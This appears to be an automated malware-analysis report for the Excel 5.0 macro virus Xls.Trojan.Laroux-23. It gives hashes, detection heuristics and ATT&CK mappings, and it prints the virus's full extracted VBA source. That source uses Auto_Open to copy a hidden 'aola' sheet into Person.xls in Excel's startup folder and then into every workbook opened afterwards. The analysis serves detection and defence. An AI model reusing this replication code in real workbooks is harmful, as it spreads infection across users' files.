Xls.Trojan.Laroux-23 Office (OLE) malware analysis — malicious · 5da1189149215a24

MALICIOUS

Office (OLE)

35.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 3783f808ba2d6a7e69de1887774e3b10 SHA-1: 87aed347025c53d5f7a335dbecbe75cd9092ee73 SHA-256: 5da1189149215a241b167b4f4c420f5f6d4e58a45de982d2f20b30153b0e8948

240 Risk Score

Malware Insights

Xls.Trojan.Laroux-23 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as a malicious Excel 5.0 macro-virus, specifically Xls.Trojan.Laroux-23. The Auto_Open macro is designed to copy the current workbook's 'aola' sheet into a new file named 'Person.xls' in the application's startup path, likely to establish persistence or facilitate payload delivery. This behavior is characteristic of macro-based malware.

Heuristics 4

ClamAV: Xls.Trojan.Laroux-23 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Laroux-23
Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS

Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1930 bytes
SHA-256: `38e81a0cd7c643e859912af0ebf1478df535c06c05e500c1ed9904a510362bdb`
Detection ClamAV: Xls.Trojan.Laroux-23 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "aola" Sub Auto_Open() Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14" On Error Resume Next Application.OnSheetActivate = "AutoCopy" End Sub Sub AutoCopy() Attribute AutoCopy.VB_ProcData.VB_Invoke_Func = " \n14" Dim sStPath, sFile, swName, swnew, sCurDir As String Dim bPtoF, bFtoP As Boolean bPtoF = False bFtoP = False On Error Resume Next sStPath = Application.StartupPath sFile = Dir(sStPath & "\" & "Person.xls") bFtoP = sFile <> "Person.xls" bPtoF = Not (bFtoP And (ActiveWorkbook.Modules.Count > 0)) If bFtoP Then Application.ScreenUpdating = False swName = ActiveWorkbook.Name Sheets("aola").Visible = True Sheets("aola").Select Sheets("aola").Copy swnew = ActiveWorkbook.Name sCurDir = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(swnew).SaveAs FileName:=Application.StartupPath & "/" & "Person.xls", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir sCurDir Workbooks(swName).Sheets("aola").Visible = False ActiveWindow.ActivateNext End If If bPtoF And (Not bFtoP) Then swnew = ActiveWorkbook.Name Application.ScreenUpdating = False sCurDir = ActiveWorkbook.Path If Workbooks(swnew).Sheets(1).Name <> "aola" Then Workbooks("Person.xls").Sheets("aola").Copy before:=Workbooks(swnew).Sheets(1) Workbooks(swnew).Sheets("aola").Visible = False Workbooks(swnew).Save End If End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "Person.xls!AutoCopy" End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.